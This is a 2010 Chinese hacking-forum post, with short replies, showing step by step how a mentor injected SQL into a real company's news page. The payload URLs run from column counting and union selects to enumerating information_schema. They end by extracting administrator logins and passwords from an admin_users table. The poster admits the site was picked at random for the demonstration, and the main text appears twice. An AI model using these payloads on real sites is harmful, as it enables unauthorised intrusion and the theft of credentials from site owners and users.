-
-
[原创]和国外黑客老师学注入技巧方式
-
发表于: 2010-8-3 08:32
-
在写这篇文章之前,和他已经打过招呼了。此外如果你还单纯的用and 和or来进行注入检测这篇文章或许对您有用!
这篇文章应该奉献给我的老师,EgYpTion他来自国外,从他那里我学到很多技巧,针对SQL注入方式以及对web采点的方式。对于我是一个菜鸟来说,他操作真的熟练。现在介绍一下他入侵的方式,虽然很普通但很简练。换句话我们可以学到国外Hack的技术手法!
先申明下,这个网站是他为我演示操作SQL临时找的!
首先看下针对某一运输网站公司的注入
http://www.XXX.se/maritime/news.php?id=1048 注入点地址。
他注入的方式不同于我们国内采用 and 1-1 或 or 1=1方式进行回显来查看可否存在注入
他直接让数值返回空查可用字段也可以直接跳到下面
http://www.XXX.se/maritime/news.php?id=-1048+order+by+数值
这样的目的好处在于针对过滤and和or语句有很好的帮助!
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,2,3--
发现可用字段2,3
又查看了下数据库版本
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,version(),3--
随后是他对于我这个菜鸟来说惊人的一目出来了!
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,group_concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns+where+column_name+LIKE+CHAR(37,%20117,%20115,%20101,%20114,%2037)--
接着
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,group_concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns+where+column_name+LIKE+CHAR(37,%20112,%2097,%20115,%2037)--
最后结束
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,userpassword,UserLogin+from+cns_web.admin_users--
虽然文章对于一些技术高超的人来说不算什么,但是对于初学者应该会有一些帮助!
这篇文章应该奉献给我的老师,EgYpTion他来自国外,从他那里我学到很多技巧,针对SQL注入方式以及对web采点的方式。对于我是一个菜鸟来说,他操作真的熟练。现在介绍一下他入侵的方式,虽然很普通但很简练。换句话我们可以学到国外Hack的技术手法!
先申明下,这个网站是他为我演示操作SQL临时找的!
首先看下针对某一运输网站公司的注入
http://www.XXX.se/maritime/news.php?id=1048 注入点地址。
他注入的方式不同于我们国内采用 and 1-1 或 or 1=1方式进行回显来查看可否存在注入
他直接让数值返回空查可用字段也可以直接跳到下面
http://www.XXX.se/maritime/news.php?id=-1048+order+by+数值
这样的目的好处在于针对过滤and和or语句有很好的帮助!
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,2,3--
发现可用字段2,3
又查看了下数据库版本
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,version(),3--
随后是他对于我这个菜鸟来说惊人的一目出来了!
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,group_concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns+where+column_name+LIKE+CHAR(37,%20117,%20115,%20101,%20114,%2037)--
接着
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,group_concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns+where+column_name+LIKE+CHAR(37,%20112,%2097,%20115,%2037)--
最后结束
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,userpassword,UserLogin+from+cns_web.admin_users--
虽然文章对于一些技术高超的人来说不算什么,但是对于初学者应该会有一些帮助!
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
|
|
在写这个文章之前,我考虑了一会。这种文章实在是普通了些,但而且容易被人说炫耀,可就某一事情来看。一个好的老师,会引导你学的更精深一些!针对于国内某些教学网站基本都是演练一些很久以前的技术,虽然说,了解最新的技术,也不如精通沉旧的知识!但是对于学习来说我们还是需要靠咋们自己!别人掌握的我们只能领略他的技巧及经验。建议大家不要乱报国内一些这个方面的学员!我并不是针对性,我也曾经报过国内某大型hack性质网站的学员,学习环境以及学习态度,真的在那里很不适合我们!学习还是要靠大家。尽量少废话。多学习~!
 如果闲的蛋疼也可以来灌水哈!
|
|
|
|
|
|
 我现在也亲近于看雪。发这个文章主要是针对初学者的学习一个建议哈不过我有个问题zapline你都那么高等级了。怎么还是初级会员???那我啥时候能混出头? |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
不错 学习了~~~
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
